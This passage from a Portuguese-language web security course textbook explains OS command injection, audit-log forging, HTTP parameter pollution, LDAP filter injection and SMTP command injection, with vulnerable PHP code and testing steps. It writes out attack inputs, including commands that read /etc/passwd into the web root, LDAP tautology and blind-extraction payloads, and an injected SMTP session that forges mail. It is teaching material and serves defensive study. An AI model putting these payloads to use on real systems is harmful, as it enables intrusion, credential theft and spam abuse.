fcil memorizar uma nica funo, como shell_exec() em PHP, por exemplo, a qual pode
ser usada para executar qualquer programa do ambiente, do que diversas outras que s
podem ser empregadas para fins especficos.
Para ilustrar esta situao, considere-se uma aplicao em PHP que tem por objetivo exibir
o endereo IP de um nome de domnio fornecido pelo usurio. O mtodo correto e seguro
de implementar esta funcionalidade consiste no uso da funo gethostbyname(), conforme
exemplo abaixo, que no permite fazer nada alm da traduo de endereos:
316
$nome_de_dominio=$_POST[dominio];
$endereco_ip = gethostbyname($nome_de_dominio);
Para isso, o programador teria de conhecer a API ou pesquisar sobre a existncia dela na documentao do PHP. Infelizmente, a soluo que tende a ser adotada, e que permite o ataque de
injeo de comandos de sistema operacional, emprega uma construo similar seguinte:
$nome_de_dominio=$_POST[dominio];
$endereco_ip = shell_exec(nslookup .$nome_de_dominio);
Quando um parmetro, presente na requisio, concatenado diretamente ao nome do
comando que deve ser executado pelo sistema operacional, um usurio malicioso pode
aproveitar-se da situao, para injetar comandos adicionais.
Note-se que, no cdigo acima, o parmetro dominio, presente na requisio, concatenado diretamente ao nome do comando que deve ser executado pelo sistema operacional.
Caso um valor legtimo, como www.esr.rnp.br, seja fornecido pelo usurio, a aplicao segue
seu curso normal e exibe o resultado, conforme ilustrado na Figura 7.1.
Figura 7.1
Resultado da
traduo de nome
de domnio para
endereo IP.
Um usurio malicioso, por outro lado, pode aproveitar-se de que capaz de controlar o valor
submetido aplicao e fornecer a entrada a seguir:
www.esr.rnp.br; cat /etc/passwd

Isso faz com que o texto abaixo seja passado ao sistema operacional, para processamento, o
que resulta na execuo do nslookup e do cat, conforme pode ser observado na Figura 7.2.
Figura 7.2
Resultado da
injeo de comando
de sistema
operacional.
importante observar que o sucesso do ataque acima depende do uso do caractere

especial ;, o qual, em ambientes Linux, permite empilhar diversos comandos. Consequentemente, caso a aplicao filtre este caractere, outra estratgia deve ser empregada, e,
assim, fundamental conhecer mtodos alternativos para submeter mltiplos comandos
simultneos ao sistema operacional. A Figura 7.3 ilustra tcnicas que podem ser utilizadas,
nslookup www.esr.rnp.br; cat /etc/passwd
quando o servidor baseado em Windows ou Linux.

317
Caractere(s)
Significado
Windows
Linux
cmd1; cmd2
Separa mltiplos comandos em uma mesma

linha.
cmd1 | cmd2
Direciona a sada do primeiro comando

(cmd1) para o segundo (cmd2).
cmd1 & cmd2
Executa cmd1 e, depois, cmd2. Embora em

Linux, seja usado aps um comando, para
execut-lo em segundo plano, tambm
atende ao propsito de submeter outro
comando.
cmd1 && cmd2
Executa cmd2, aps cmd1, somente se este

retornar sem erro.
cmd1 || cmd2
Executa cmd2, aps cmd1, somente quando

este retornar com erro.
Figura 7.3
Caractere(s)
especial(is) que
permite(m) submeter mltiplos
comandos ao
sistema operacional
simultaneamente.
Outro aspecto que deve ser notado, em relao ao ltimo exemplo, que a sada do comando
injetado exibida na tela, junto com o resultado do comando original. Este, porm, nem
sempre o cenrio encontrado na prtica, e, nesses casos, a sada deve ser direcionada para
um arquivo em alguma pasta que possa ser acessada remotamente. Um forte candidato, neste
sentido, a prpria rvore de diretrios da aplicao web, e o caractere especial que possibilita
enviar o resultado da execuo de um comando para um arquivo o >. Para exemplificar,
considere-se que o diretrio raiz da aplicao se encontra em /var/www/html/site. O ataque
pode ser efetuado, empregando-se o seguinte valor de entrada:
www.esr.rnp.br; cat /etc/passwd > /var/www/html/site/passwd

Em seguida, basta acessar o arquivo gerado, utilizando um navegador web, conforme ilus-
trado na Figura 7.4.
Elaborando um pouco mais o cenrio, considere-se que o resultado do comando injetado

no exibido e nem se sabe o diretrio em que a aplicao est instalada. Neste caso, um
modo de testar se ela vulnervel ao ataque consiste em se aplicar uma das tcnicas
empregadas em ataques de injeo de SQL s cegas, que se baseia na tentativa de introduo de uma pausa na execuo do sistema (Stuttard e Pinto, 2007). Isto pode ser obtido,
por exemplo, por meio do comando ping, empregado da seguinte maneira:
318
Figura 7.4
Acesso ao arquivo
passwd gerado por
um ataque de injeo de comandos.
argumento & ping -c 30 localhost

O qual causar um atraso somente se a aplicao apresentar a vulnerabilidade. Com base
nesse mtodo, possvel traar o seguinte roteiro geral de testes:
1.
Para cada item de entrada identificado na fase de mapeamento, que aparente ser
passado como argumento para um comando do sistema operacional:
1.1.Fornea o valor abaixo:
valor & ping c 30 <nome de domnio vlido>

1.2.Se uma pausa de cerca de 30 segundos ocorrer, a aplicao vulnervel.
1.3.Caso no ocorra, repita o Passo 1.1, utilizando outros caracteres para submisso de
mltiplos comandos.
Injeo em trilhas de auditoria

Trilhas de auditoria so constitudas de registros que descrevem as atividades realizadas
em um ambiente, independente de sucesso ou falha.

Um mecanismo desse tipo deve registrar diversos eventos, tais como: operaes administrativas, tentativas de conexo ao sistema, encerramento de sesses, ativao ou desativao do
prprio mdulo de auditoria e operaes crticas, dentre outros. A lista completa de eventos
a ser contemplada, normalmente, resulta de uma anlise de riscos do ambiente, de normas
e padres de segurana da informao e de leis. Ademais, para que o mecanismo seja eficaz,
cada registro deve indicar, em relao ao evento, pelo menos data e hora de ocorrncia, a
identidade do usurio envolvido, a ao realizada, se a operao foi bem-sucedida ou no e o
endereo de rede originrio do evento.
Os principais propsitos para o uso deste mecanismo de segurana, segundo Grzelak
(2007), podem ser sumarizados em trs categorias:
1 Depurao de programas usado no incio do ciclo de desenvolvimento do software,

para auxiliar na deteco de erros de lgica e consequente melhoria do produto.
Muitas vezes, esta funcionalidade acaba sendo transportada para o ambiente de
produo, embora isto seja uma m prtica de segurana.
1 Deteco de comportamento anmalo ou malicioso uma vez implantada a

aplicao, em ambiente de produo, a partir dos eventos registrados, possvel
detectar comportamento inesperado do sistema ou atividade maliciosa de usurios,
que viola a poltica de segurana vigente.
1 Evidncia em processos forenses trilhas de auditoria so fundamentais, do ponto de

Ataques de injeo em trilhas de auditoria, tratados nesta seo, permitem inserir registros fraudulentos de eventos, quando elas so armazenadas especificamente em arquivos
de texto puro. Note-se que o resultado da explorao viola a integridade do arquivo como
um todo, afetando diretamente os dois ltimos objetivos acima mencionados.
No caso do primeiro, o principal requisito de segurana da informao a ser atendido o
sigilo das trilhas, o que torna o ataque pouco apropriado para aquele escopo. Para isso,
outras tcnicas devem ser usadas, visando o comprometimento da plataforma ou a injeo
de comandos de sistema operacional.
vista legal, para imputar a indivduos especficos responsabilidade sobre aes realizadas.
319
Para entender a vulnerabilidade e como ela pode ser explorada, considere-se uma aplicao
que registra em um arquivo de trilha de auditoria as tentativas vlidas e invlidas de autenticao, conforme ilustrado na Figura 7.5.
[root@seg9 logi]# cat logfile

[07/04/2012 - 10:14:22] Conta esr se conectou com sucesso.
[07/04/2012 - 10:14:27] Tentativa de conexo com a conta es.
[07/04/2012 - 10:14:35] Tentativa de conexo com a conta adm.
Figura 7.5
Exemplo de arquivo
de trilha de
auditoria.
Sejam os seguintes trechos de cdigo os responsveis pela populao do arquivo:
$userid=$_POST[userid];
...
fwrite($res, $date.Conta .$userid. se conectou com sucesso.\n);
...
fwrite($res, $date.Tentativa de conexo com a conta
.$userid..\n);
Observe-se que o valor da varivel $userid obtido a partir de um parmetro da requisio e diretamente concatenado mensagem a ser gravada, sem nenhum tratamento. Se
um usurio malicioso desejar inserir um registro fraudulento no arquivo de trilhas, ele deve
fornecer um caractere de final de linha, como parte do parmetro, seguido do texto que
quer injetar:
esr.%0a[07/04/2012 - 10:14:40] Conta admin se conectou com sucesso

Isso faz com que o segundo fwrite() seja usado e o texto malicioso, inserido no final da
mensagem. A sequncia %0a corresponde codificao URL do caractere de final de
linha, o qual, quando gravado, finaliza o registro atual e inicia o prximo, cujo contedo, no
exemplo, consiste no restante do identificador de usurio digitado pelo atacante. O resultado final pode ser observado na Figura 7.6, que destaca em negrito o texto injetado.
[07/04/2012 - 10:14:22] Conta esr se conectou com sucesso.

[07/04/2012 - 10:14:27] Tentativa de conexo com a conta es.
[07/04/2012 - 10:14:35] Tentativa de conexo com a conta adm.
320
[07/04/2012 - 10:14:21] Tentativa de conexo com a conta esr.

[07/04/2012 - 10:14:22] Conta admin se conectou com sucesso.
Um ponto importante que deve ser ressaltado, para o sucesso do ataque, que o caractere de
final de linha deve ser inserido, codificado, por meio de um proxy de interceptao, porque, a
partir da tela da aplicao, s possvel fornecer caracteres imprimveis. A digitao do valor
%0a ou \n entendida pelo navegador web como uma sequncia de mltiplos caracteres,
dos quais % e \ passam por codificao URL, antes de serem enviados.
Figura 7.6
Resultado da
injeo de um
registro de trilha
de auditoria.
Algumas implementaes de sistemas de trilhas de auditoria tentam evitar a adulterao

e insero de registros, adicionando um campo que contm o hash criptogrfico de cada
entrada do arquivo. Esta soluo completamente insegura, pois a gerao de hash no
depende de nenhuma informao sigilosa, e, logo, pode ser reproduzida pelo atacante e
injetada junto com a entrada maliciosa. Dada esta justificativa, fica fcil perceber que uma
abordagem correta deve, em vez de funes de hash criptogrfica, empregar algoritmos de
assinatura digital ou cdigos de autenticao de mensagens.
Verificar se uma aplicao vulnervel injeo em trilhas de auditoria uma tarefa difcil,
quando o teste realizado do tipo caixa-preta. Isso acontece porque nesses casos no
possvel ver o formato dos registros de auditoria e nem o resultado da injeo, salvo se, por
problemas na configurao das plataformas subjacentes, for possvel acessar o arquivo no qual
os eventos so gravados. Desse modo, recomenda-se que, para esta fraqueza, os testes sejam
suportados por informaes adicionais, como formato do arquivo e cdigo-fonte, por exemplo.
Poluio de parmetros HTTP

O ataque de poluio de parmetros HTTP (HPP) foi introduzido em 2009 por Luca Carettoni
e Stefano di Paola, no OWASP EU09, realizado na Polnia.
Basicamente, afeta aplicaes que usam valores de parmetros HTTP, para construir,
dinamicamente, links para recursos, sem verificar se aqueles pertencem ao domnio

esperado. Embora pouca ateno seja dada a esta tcnica, ela bastante poderosa e
pode afetar o cdigo da aplicao tanto no lado do cliente como do servidor.
Alguns cenrios de uso possveis incluem a quebra de tokens anti-CSRF, contorno de
firewalls de aplicao e alterao de parmetros de requisio, supostamente, fora do
controle do usurio.
Antes de prosseguir com a explicao do problema em si, importante discutir o que
ocorre em aplicaes web, quando so submetidas mltiplas instncias de um mesmo
parmetro HTTP. Note-se que tal situao comum em formulrios que utilizam um
conjunto de check-boxes, que compartilham o mesmo nome.
Nestes casos, como a repetio esperada, os desenvolvedores normalmente utilizam
as funes adequadas para tratamento de mltiplos valores. Porm, quando o comportamento normal que o parmetro aparea uma nica vez, a tendncia que sejam
usadas funes que assumam esta premissa como verdadeira.
Quando isso acontece, o valor que devolvido aplicao depende da tecnologia web
Figura 7.7
Precedncia
adotada na presena
de mltiplos
parmetros com o
mesmo nome.
Tecnologia/Servidor
Mtodo/Funo
Precedncia
ASP/IIS
Request.QueryString(par)
Todas as ocorrncias,
delimitadas por vrgula.
PHP/Apache
$_GET[par]
ltima ocorrncia.
JSP/Tomcat
Request.getParameter(par)
Primeira ocorrncia.
Perl (CGI)/Apache
Param(par)
Primeira ocorrncia.
Python/Apache
getValue(par)
Todas as ocorrncias, em
uma lista.
adotada, conforme se observa na Figura 7.7, extrada de (Balduzzi, 2011).
321
Uma pequena variao do cenrio acima, mas que possui o mesmo efeito, consiste na
submisso de parmetros com mesmo nome no corpo da requisio e na URL simultaneamente. O valor que considerado depende, novamente, das tecnologias que so empregadas pela aplicao. Por exemplo, quando JSP usado em conjunto com Tomcat, o valor
da URL devolvido, e, para PHP com Apache, retorna-se o argumento contido no corpo da
requisio. Note-se que, de modo a evitar problemas, uma boa prtica que deve ser seguida,
neste contexto, sempre buscar o valor no canal especfico esperado (Balduzzi, 2011).
Agora que os fundamentos necessrios foram cobertos, considere-se uma aplicao
escrita em PHP, que permite que o usurio participe de uma enquete, depois de fornecido
o nmero dela (vide Figura 7.8). Quando isso ocorre, a seguinte requisio realizada pelo
navegador web:
http://hpp.esr.rnp.br:80/build_poll.php?numero=123456&Submit1=Prosseguir
E uma ficha para votao exibida ao usurio, contendo um link para cada uma das opes
possveis, como se observa na Figura 7.9.
Figura 7.8
Aplicao para participar de enquete.
Figura 7.9
Ficha de votao.
O cdigo que constri a ficha de votao obtm o nmero da enquete a partir do parmetro
numero e o utiliza na construo dinmica de cada link, sem validao do valor fornecido:
$numero=$_REQUEST[numero];
...
echo(<a href=http://hpp.esr.rnp.br/post_vote.php?id=1&poll_id=.
322
$numero.>XSS</a><br>);
...
Quando um nmero legtimo fornecido, um elemento semelhante ao abaixo inserido na
pgina HTML:
<a href=http://hpp.esr.rnp.br/post_vote.php?id=1&poll_id=123456>XSS
</a><br>
O que acontece, porm, se o usurio induzido a acessar um link para a URL abaixo?
http://hpp.esr.rnp.br/build_poll.php?numero=123456%26id%3d3
Observe-se que o valor do parmetro numero usa codificao URL e corresponde ao
texto numero=123456&id=3. Quando a aplicao o utiliza para gerar os links da cdula de
votao, os seguintes elementos so criados:
<a href=http://hpp.esr.rnp.br/post_vote.php?id=1&poll_id=123456&id=3>
XSS</a><br>
Injeção de SQL</a><br>
CSRF</a>
Neste cenrio, o script post_vote.php, ao extrair o parmetro id, por meio da construo
$_GET[id], devido s regras de precedncia de PHP, obter sempre o valor 3.
Em decorrncia disso, independente da opo escolhida, o voto sempre ser depositado
para o ataque CSRF, correspondente ao identificador injetado.
Valendo-se das regras de precedncia, um desenvolvedor ingnuo pode tentar mitigar o
problema, colocando o parmetro id ao final da query string, por meio da seguinte alterao no cdigo:
echo(<a href=http://hpp.esr.rnp.br/post_vote.php?poll_id=.
$numero.&id=1>XSS</a><br>);
Com esta melhoria, de fato, o ataque executado anteriormente deixa de funcionar. Entretanto, um usurio malicioso pode empregar o caractere #, para impedir que o parmetro
inserido no final da query string seja enviado durante a requisio. Para isso, a URL do link
que a vtima precisa clicar deve ser alterada para o seguinte valor:
http://hpp.esr.rnp.br/build_poll2.php?numero=123456%26id%3d3%23
Ao gerar a cdula com o novo cdigo e o parmetro ajustado, os elementos a seguir so criados:
<a href=http://hpp.esr.rnp.br/post_vote.php?poll_id=123456&id=3#&id=1>
XSS</a><br>
Injeção de SQL</a><br>
CSRF</a>
Desse modo, ao selecionar uma opo, somente o parmetro fixado pela poluio enviado
ao servidor, para processamento, em detrimento do valor original. Consequentemente, o
resultado da enquete pode ser manipulado, caso a maioria dos participantes acesse a apli-
cao, por meio de uma pgina maliciosa, que efetue o ataque.

323
Para verificar se uma aplicao vulnervel poluio de parmetros HTTP, os seguintes

passos podem ser executados:
1.
Determine a precedncia de parmetros HTTP utilizados pelas tecnologias web empregadas.

1.1.Escolha um parmetro de requisio identificado na fase de mapeamento, que
exibido na resposta da aplicao.

1.2.Submeta uma requisio com o parmetro duplicado, mas com um valor diferente.
1.3.Veja qual dos dois valores exibido, para determinar a precedncia.
2. Verifique se parmetros definidos no corpo da requisio ou em cookies possuem prece-
dncia menor que os de URLs.

2.1.Escolha um parmetro de requisio identificado na fase de mapeamento, que
aparece no corpo da mensagem e que exibido na resposta da aplicao.

2.2.Submeta uma requisio com o parmetro copiado na URL, mas com um valor diferente.
2.3.Veja qual dos dois valores exibido, para determinar a precedncia.
3. Teste os parmetros que so vulnerveis poluio:
3.1.Para cada parmetro identificado na fase de mapeamento, inclua ao final do valor
um parmetro inexistente, como &esr=rnp, por exemplo, mas de maneira codificada, isto , %26esr%3drnp.
3.2.Verifique se o parmetro injetado aparece em links ou em formulrios, sem con-
siderar o parmetro testado, que pode mudar de nome, no documento fornecido

como resposta. Em caso positivo, o parmetro alvo vulnervel poluio.
Injeo em filtros LDAP

Lightweight Directory Access Protocol (LDAP), como o prprio nome sugere, um proto-
colo leve e eficiente usado para acessar diretrios de informaes, especificamente, os

X.500
baseados na srie de padres X.500.

Tais diretrios so organizados hierarquicamente em formato de rvore, de maneira a representar a estrutura organizacional de uma entidade, ou, alternativamente, a estrutura de nomes
de domnio da internet, conforme ilustrado na Figura 7.10(a) e Figura 7.10(b), respectivamente.
Cada entrada de um diretrio referenciada de maneira nica, por meio do Distingui-
shed Name (DN), que composto pela concatenao dos nomes de todos os ns pertencentes ao caminho entre ela prpria e a raiz (Zeilenga, 2006a).
Por exemplo, a entrada uid=Fulano, representada na Figura 143(b), possui como DN o valor
324
uid=Fulano, ou=People, dc=RNP, dc=BR.
Conjunto de padres
desenvolvido pelo ITU-T,
que define aspectos de
servios de diretrios
eletrnicos.
raiz
raiz
c = BR
dc = BR
st = So Paulo
dc = RNP
ou = Group
o = RNP
ou = CAIS
ou = People
uid = Fulano
ou = ESR
uid = Fulano
(a)
Um elemento do diretrio corresponde a uma instncia de uma classe de objeto, a qual

descreve os atributos que o compem e quais deles obrigatoriamente devem sempre estar
presentes. Assim como o prprio diretrio, tambm possvel organiz-las de maneira
hierrquica, o que faz que todas as propriedades da classe-me sejam herdadas pela
classe-filha. Agrupamentos de classes so definidos em esquemas, os quais devem ser
carregados pelo servidor LDAP, durante o processo de inicializao. Considerando o mesmo
exemplo usado acima, tem-se que o objeto em questo pertence classe account, cujo
nico atributo mandatrio o userid, tambm chamado de uid. Dentre os atributos
opcionais esto organizationalUnitName, host e description.
Observe-se que acessar um determinado objeto na rvore, por meio do DN, trivial, uma
vez que basta percorr-lo do final para o comeo, para se chegar ao n desejado.
Muitas vezes, porm, necessrio procurar um ou mais elementos no diretrio, que
atendam a um conjunto de critrios dependentes da aplicao. Por exemplo, em um

sistema de gesto de identidades, pode-se desejar encontrar todos os colaboradores
que desempenham determinada funo na empresa ou que possuem privilgios administrativos sobre um sistema. Nesses casos, devem ser empregados filtros de busca, cuja
representao textual segue a gramtica descrita na RFC 4515 (Smith e Howes, 2006), a
qual est reproduzida no apndice deste captulo.
O ataque surge quando a aplicao contri, dinamicamente, tais filtros, com base em
valores no validados, fornecidos por usurios.
Para compreender melhor o ataque desta seo, fundamental que o leitor esteja familiarizado com a sintaxe de tais filtros, pois neles que ocorre a injeo. Como ponto de partida,
observe-se que todo filtro delimitado por parnteses e que os operadores seguem uma
notao prefixada. Com isso em mente, possvel construir a seguinte consulta bsica, para
se encontrar todos os elementos cujo atributo uid seja igual a esruser:
(uid=esruser)
Figura 7.10
Estruturas de
diretrios: (a)
Modelo tradicional.
(b) Modelo baseado
em DNS.
(b)
325
Note-se que a busca feita em toda a rvore, uma vez que um n base no foi definido,
como elemento inicial.
Alterando um pouco o filtro para uso em um sistema de autenticao de usurios, chega-se
ao seguinte filtro, que visa encontrar objetos com uid e senha especficos:
(&(uid=esruser)(senha=pwd))
Considere-se agora uma aplicao que permite localizar todos os funcionrios que moram
em uma de vrias cidades especificadas pelo usurio. Neste cenrio, supondo que o conjunto escolhido fosse composto por Campinas, Braslia e Vinhedo, um possvel filtro seria:
(|(cidade=Campinas)(cidade=Braslia)(cidade=Vinhedo))
Um ponto importante que deve ser observado neste ltimo exemplo que o operador |
(OR) permite mais que dois operandos, da mesma maneira que o & (AND).
Outras construes que podem ser teis no contexto desta seo esto abaixo listadas:
1 (atributo=*) seleciona elemento se o atributo estiver presente.

1 (!(atributo=valor)) seleciona n se o atributo for diferente do valor especificado.
1 (objectClass=*) seleciona todo e qualquer objeto, pois indica que ele pode pertencer a
qualquer classe existente.
1 (&) verdadeiro absoluto.

1 (|) falso absoluto.
De tudo que j foi abordado at aqui, fica fcil concluir que um ataque de injeo em filtros
LDAP (Alonso et al., 2008; Guillardoy et al., 2010a; Faust, 2003) ocorre quando eles so construdos, dinamicamente, a partir de valores fornecidos pelo usurio, que no passaram por
uma devida validao. Com o objetivo de entender o mtodo de explorao e as dificuldades
existentes em alguns casos, considere-se a aplicao escrita em PHP e ilustrada na Figura 7.11,
que exibe diversas informaes do usurio, desde que sejam fornecidas credenciais vlidas.
326
Figura 7.11
Aplicao vulnervel injeo em
filtro LDAP.
O filtro de busca construdo por meio dos seguintes comandos, que concatenam os valores
dos parmetros uid e pwd, fornecidos na requisio POST:
$uid=$_POST[uid];
$pwd=$_POST[pwd];
...
$filter = (&(uid=.$uid.)(userPassword=.$pwd.));
Relembrando o ataque de injeo de SQL, em cenrio similar, a estratgia consistiria na

insero de uma tautologia, como id or 1=1--. Note-se, porm, que no possvel aplicar
a mesma ideia, no exemplo acima, primeiro, porque o operador prefixado e no pode ser
substitudo, e, segundo, porque no h como comentar o restante da linha, de modo a evitar
a criao de um filtro sintaticamente incorreto. Desse modo, injees em filtros baseados
em operador & s funcionam se o servidor considerar apenas a parte inicial e correta do
filtro submetido, como acontecia, antigamente, com o OpenLDAP (Alonso et al., 2008). Neste
caso, um usurio malicioso poderia fornecer um texto qualquer para pwd, e o seguinte
valor para uid:
root)(&)
Que resultaria no seguinte filtro:
(&(uid=root)(&))(userPassword=senha))
\_ _ _ _ _ _ _ _ _ _ _ _ _ _/\_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _/
Filtro vlido
Parte descartada
O qual permitiria que as informaes do usurio root fossem visualizadas, mesmo que no
se conhea a senha da conta (vide Figura 7.10).
Uma situao mais plausvel de ser explorada, que no depende de vulnerabilidades no

servidor, ocorre quando a aplicao utiliza filtros baseados no operador |. Como exemplo,
considere-se uma aplicao escrita em PHP, que permite listar dispositivos pertencentes a
classes escolhidas pelo usurio (vide Figura 7.12) e que constri o filtro com o cdigo abaixo:
$filter = (|(l=xpto);
if ($ _ REQUEST[imp]) {
$filter = $filter.(l=.$ _ REQUEST[imp].);
}
if ($ _ REQUEST[sca]) {
$filter = $filter.(l=.$ _ REQUEST[sca].);
}
if ($ _ REQUEST[plo]) {
$filter = $filter.(l=.$ _ REQUEST[plo].);
}
Figura 7.12
Resultado de
injeo em filtro
LDAP baseado em
operador &.
$filter = $filter.);
327
Figura 7.13
Aplicao vulnervel injeo em
filtro LDAP.
Para explorar esta aplicao, possvel, por exemplo, interceptar a requisio e alterar o
valor de imp de impressora para a forma codificada de:
impressora)(objectClass=*
Resultando no seguinte filtro e, consequentemente, na listagem de todos os objetos do diretrio, conforme ilustrado na Figura 7.13:
(|(l=xpto)(l=impressora)(objectClass=*))
O teste para verificar se uma aplicao vulnervel injeo em filtros LDAP consiste nos
passos descritos a seguir:
1.
Para cada item de entrada identificado na fase de mapeamento:

1.1.Fornea um nmero crescente de caracteres (, com o objetivo de causar um erro
sinttico no filtro LDAP, que seja exibido ou informado pela aplicao.

1.2.Se o passo anterior no for bem-sucedido, execute-o novamente usando o carac-
tere ) no lugar de (, e veja se o resultado da consulta sofre alguma alterao.

1.3.Caso qualquer dos passos anteriores seja efetuado com sucesso, infira se o valor
est sendo usado em um filtro baseado em operador | ou &.

1.4.Para o operador |, fornea um valor como valor)(& e veja se a quantidade de
resultados aumenta.
1.5.Para o operador &, submeta um valor como valor)(| e veja se a resposta usual
deixa de ser exibida.
Injeo em filtros LDAP s cegas

328
Figura 7.14
Resultado de
injeo em filtro
LDAP baseado em
operador |.
Ataques de injeo em filtros LDAP s cegas utilizam a mesma estratgia que a contra-
parte baseada em SQL, que consiste na submisso de perguntas booleanas aplicao,

para extrao de um bit de informao por vez. Para que eles funcionem corretamente,
necessrio ser capaz de discernir se uma expresso injetada avaliada como verdadeira ou falsa, o que se pode conseguir por meio da identificao de diferenas nas
respostas do servidor.
Por exemplo, considerando um filtro baseado em &, se a tela exibida em funo de uma
requisio como a ilustrada na Figura 7.14, sabe-se que todos os operandos so verdadeiros,
para o objeto selecionado. Por outro lado, se o resultado obtido o representado na Figura 7.15,
conclui-se que nenhum objeto presente no diretrio satisfaz todas as subexpresses do filtro.
Supondo que a resposta positiva resulte da submisso do id root e da senha correspondente, a injeo de uma pergunta possvel, alterando-se o valor do identificador da
seguinte maneira:
root)(pergunta booleana
Por exemplo, para verificar se o objeto pertence classe user, o valor submetido deve ser:
root)(objectClass=user
Resultando no filtro:
(&(uid=root)(objectClass=user)(userPassword=senha))
Neste caso, as informaes da conta somente continuaro a ser exibidas, se a expresso
(objectClass=user) for verdadeira.
Adotando o mesmo raciocnio, para verificar se o objeto possui determinado atributo,
pode-se utilizar a entrada:
root)(attr=*
Se ele existir, o prximo passo consiste em descobrir o valor definido para o objeto selecionado, o que pode ser realizado por meio do caractere curinga *, desde que a propriedade
Substring Rule do atributo tenha sido configurada, para permitir comparao parcial.
A ideia consiste em percorrer, iniciando-se na primeira posio do valor que se quer descobrir, todos os caracteres possveis, at se encontrar o correto. Em seguida, a primeira
posio fixada com o valor certo e o processo, repetido para a segunda posio. O mtodo
continua at que o valor inteiro seja recuperado.
Supondo que o atributo attr, no exemplo acima, somente aceite letras e tenha o valor
tela, as seguintes requisies devem ser enviadas aplicao:
Figura 7.15
Resultado quando o
filtro no encontra
objetos.
329
Primeira posio
root)(attr=a*
root)(attr=b*
...
root)(attr=t*
Segunda posio
root)(attr=ta*
...
root)(attr=te*
Terceira posio
root)(attr=tea*
...
root)(attr=tel*
Quarta posio
root)(attr=tela*
Quinta posio
root)(attr=telaa*
...
root)(attr=telaz*
importante observar que no h como especificar, em um filtro LDAP, o comprimento
de um atributo, e, assim, no cenrio abordado, o processo de descoberta deve ser realizado at a quinta posio, para se concluir que o valor possui apenas quatro caracteres.
Claramente, o processo demorado e precisa ser automatizado, para se extrair o contedo
de um diretrio inteiro. Recorrendo, novamente, contraparte em SQL, pode-se pensar em
aplicar as tcnicas de busca binria ou bit-a-bit, de modo a melhorar a eficincia do ataque.
Entretanto, enquanto a ltima no possvel, a primeira depende das propriedades

Ordering e Substring Rule, de cada atributo.
Injeo de comandos SMTP e de cabealhos de e-mail

Muitas aplicaes web apresentam uma pgina que permite que usurios enviem
comentrios, elogios, reclamaes e dvidas sobre os servios oferecidos pela entidade, independente do ramo de atuao. Um meio de implementar essa funcionalidade
resume-se em enviar a mensagem, por meio de correio eletrnico, podendo a aplicao
estabelecer uma conversao SMTP diretamente com o servidor de e-mails, ou usar uma
funo que encapsule tal conhecimento.
330
Em um cenrio possvel, comandos SMTP injetados em um campo so inseridos em uma con-
versao SMTP, o que permite que duas mensagens de correio eletrnico sejam enviadas.
Em qualquer dos casos, porm, vulnerabilidades implicam poder enviar mensagens arbitrrias,
Spam
Consiste no envio
de mensagens
no solicitadas de
correio eletrnico,
com objetivos to
diversos como
realizar propaganda e
disseminar malware,
por exemplo.
sem autenticar-se, e, por isso, so usadas para a disseminao de spam (Stuttard e Pinto, 2007).
Antes de descrever os ataques, importante realizar uma breve reviso do protocolo SMTP,
para se conhecer os comandos necessrios para o envio de mensagens. Uma interao
tpica, realizada entre cliente e servidor, est ilustrada na Figura 7.16 e explicada a seguir.
O comando HELO permite que o cliente se identifique para o servidor, informando o nome
de domnio que possui. Aps receber a resposta, o envelope definido pelos comandos
MAIL e RCPT, com os quais so especificados remetente e destinatrio, respectivamente.
Os cabealhos e o corpo da mensagem so enviados, aps a execuo do comando DATA, e
um ponto (.) sozinho em uma linha usado para indicar o fim da mensagem. Finalmente, a
submisso ao destinatrio ocorre quando o cliente efetua um QUIT.
~$ telnet alt1.aspmx.l.exemplo.com 25
Trying 100.100.100.27...
Connected to alt1.aspmx.l.exemplo.com.
Escape character is ^].
220 mx.exemplo.com ESMTP fq5si3132623vcb.146
HELO e100.esr.rnp.br
250 mx.exemplo.com at your service
MAIL FROM:<esruser@esr.rnp.br>
250 2.1.0 OK fq5si3132623vcb.146
RCPT TO:<esruser@gmail.com>
250 2.1.5 OK fq5si3132623vcb.146
DATA
354
Go ahead fq5si3132623vcb.146
From:esruser@esr.rnp.br
Teste de SMTP
.
250 2.0.0 OK 1334581185 fq5si3132623vcb.146
Figura 7.16
Conversao SMTP
para envio de mensagem de correio
eletrnico.
QUIT
221 2.0.0 closing connection fq5si3132623vcb.146
Connection closed by foreign host.
Subject:Teste
331
Para entender a primeira vulnerabilidade, considere-se uma aplicao que aceita do usurio
o endereo de correio eletrnico, o assunto e o corpo da mensagem, e que os insere
diretamente em uma conversao SMTP com o servidor de e-mails, como parte dos
comandos apropriados. O que aconteceria se um usurio malicioso finalizasse o texto com
uma quebra de linha e um ponto, fornecendo, em seguida, os comandos MAIL, RCPT e DATA,
conforme ilustrado na Figura 7.17?
Mensagem original.
.
MAIL FROM:<evil@evil.org>
RCPT TO:<outro.usuario@localhost>
DATA
From:evil@evil.org
To:outro.usuario@localhost
Subject:Mensagem falsa
Esta mensagem foi forjada!
Figura 7.17
Texto original fornecido aplicao.
Supondo que o cdigo responsvel por gerar os comandos SMTP da interao entre a aplicao e o servidor de e-mail fosse o representado na Figura 7.18, o resultado obtido com a
substituio de $message pelo valor exibido na Figura 7.17, bem como das demais variveis
pelos argumentos associados, seria o ilustrado na Figura 7.19, excetuando-se a numerao.
Observe-se que, com a injeo do contedo identificado pelas linhas 09 a 17, formaram-se
duas conversaes SMTP distintas, compostas pelas linhas 02 a 09 e 10 a 18, o que faz com
que duas mensagens de correio eletrnico sejam enviadas. Neste cenrio, se o servidor
estiver mal configurado, de modo a permitir o encaminhamento de mensagens de usurios
externos para outros domnios, qualquer destinatrio da internet poder ser especificado,
facilitando a vida dos spammers (pessoas que enviam spams).
$cmd = HELO localhost.PHP_EOL;

$cmd = $cmd.MAIL FROM:<.$from.>.PHP_EOL;
$cmd = $cmd.RCPT TO:<.$realto.>.PHP_EOL;
332
$cmd = $cmd.DATA.PHP_EOL;
$cmd = $cmd.From:.$from.PHP_EOL;
$cmd = $cmd.Subject: .$subject.PHP_EOL.PHP_EOL;
$cmd = $cmd.$message.PHP_EOL;
$cmd = $cmd...PHP_EOL;
$cmd = $cmd.QUIT.PHP_EOL;
Figura 7.18
Trecho de cdigo
que armazena em
$cmd os comandos
SMTP a serem enviados ao servidor
de e-mails.
01 HELO localhost
02 MAIL FROM:<morpheus@esr.rnp.br>
03 RCPT TO:<supervisor@localhost>
04 DATA
05 From:morpheus@esr.rnp.br
06 Subject: Teste
07
08 Mensagem original.
09 .
10 MAIL FROM:<evil@evil.org>
11 RCPT TO:<outro.usuario@localhost>
12 DATA
13 From:evil@evil.org
